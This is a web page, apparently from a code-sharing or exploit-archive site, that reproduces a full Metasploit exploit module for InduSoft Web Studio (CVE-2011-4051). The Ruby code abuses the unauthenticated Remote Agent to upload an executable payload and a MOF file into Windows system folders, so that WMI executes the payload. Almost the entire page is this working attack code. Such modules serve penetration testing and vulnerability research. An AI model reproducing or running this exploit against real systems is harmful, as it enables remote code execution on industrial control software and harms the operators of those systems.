扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE include Msf::Exploit::WbemExec def initialize(info = {}) super(update_info(info, 'Name' => 'InduSoft Web Studio Arbitrary Upload Remote Code Execution', 'Description'=> %q{ This module exploits a lack of authentication and authorization on the InduSoft Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to the filesystem, by abusing the functions provided by the software. The module uses uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows XP SP3 and Windows 2003 SP2. }, 'Author' => [ 'Luigi Auriemma', # Vulnerability Discovery 'juan vazquez' # Metasploit module ], 'License'=> MSF_LICENSE, 'References' => [ [ 'CVE', '2011-4051' ], [ 'OSVDB', '77179' ], [ 'BID', '50675' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-330' ] ], 'Privileged' => true, 'Payload'=> { 'BadChars' => "", }, 'Platform' => 'win', 'Targets'=> [ [ 'Windows XP / 2003', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 04 2011')) register_options([Opt::RPORT(4322)], self.class) end def check connect # Get Application version data = [0x14].pack("C") sock.put(data) app_info = sock.get_once disconnect if app_info =~ /InduSoft Web Studio v6\.1/ return Exploit::CheckCode::Vulnerable elsif app_info =~ /InduSoft Web Studio/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def upload_file(filename, my_payload) connect # Get Application version data = [0x14].pack("C") sock.put(data) app_info = sock.get_once if app_info !~ /InduSoft Web Studio/ print_error("#{@peer} - InduSoft Web Sutio hasn't been detected, trying to exploit anyway...") end # Get Operating System data = [0x13].pack("C") sock.put(data) os_info = sock.get_once if os_info !~ /WINXP/ and os_info !~ /WIN2K3/ print_error("#{@peer} - Exploitation through Windows Management Instrumentation service only works on windows pre-vista system, trying to exploit anyway...") end # Upload file data = "\x02\x37" # Command => Select destination data << [my_payload.length].pack("V") # Data length data << "#{filename}" # File name to upload data << "\x09\x00\x30\x00\x00\x00" data << "\x10\x03" # End of packet # The data must be split on 1024 length chunks offset = 0 # Data to send count = 1 # Number of chunks sent groups = 0 # Data must be sent in groups of 50 chunks chunk = my_payload[offset, 1024] while not chunk.nil? # If there is a group of chunks, send it if count % 51 == 0 data << "\x02\x2c" # Command => Send group of chunks my_count = [count].pack("V") # Number of chunks data << my_count.gsub(/\x10/, "\x10\x10") data << "\x10\x03" # End of packet sock.put(data) res = sock.get_once if res !~ /\x02\x06\x10\x03/ return res end count = count + 1 groups = groups + 1 data = "" end pkt = [ 0x02, 0x2e ].pack("C*") # Command => Chunk Data my_count = [count].pack("V") pkt << my_count.gsub(/\x10/, "\x10\x10") # Chunk ID pkt << [chunk.length].pack("V").gsub(/\x10/, "\x10\x10") # Chunk Data length pkt << chunk.gsub(/\x10/, "\x10\x10") # Chunk Data pkt << "\x10\x03" # End of packet data << pkt offset = (count - groups) * 1024 chunk = my_payload[offset, 1024] count = count + 1 end pkt = [ 0x02, 0x03].pack("C*") # Command => End of File my_count = [count].pack("V") pkt << my_count.gsub(/\x10/, "\x10\x10") # Chunk ID pkt << rand_text_alpha(8) # LastWriteTime pkt << rand_text_alpha(8) # LastAccessTime pkt << rand_text_alpha(8) # CreationTime pkt << "\x20\x00\x00\x00" # FileAttributes => FILE_ATTRIBUTE_ARCHIVE (0x20) pkt << rand_text_alpha(1) pkt << "\x10\x03" # End of packet data << pkt sock.put(data) res = sock.get_once disconnect return res end def exploit @peer = "#{rhost}:#{rport}" exe = generate_payload_exe exe_name = rand_text_alpha(rand(10)+5) + '.exe' mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof= generate_mof(mof_name, exe_name) print_status("#{@peer} - Uploading the exe payload to C:\\WINDOWS\\system32\\#{exe_name}") res = upload_file("C:\\WINDOWS\\system32\\#{exe_name}", exe) if res =~ /\x02\x06\x10\x03/ print_good "#{@peer} - The exe payload has been uploaded successfully" else print_error "#{@peer} - Error uploading the exe payload" return end print_status("#{@peer} - Uploading the mof file to c:\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}") res = upload_file("c:\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) if res =~ /\x02\x06\x10\x03/ print_good "#{@peer} - The mof file has been uploaded successfully" else print_error "#{@peer} - Error uploading the mof file" return end end end |
体验盒子
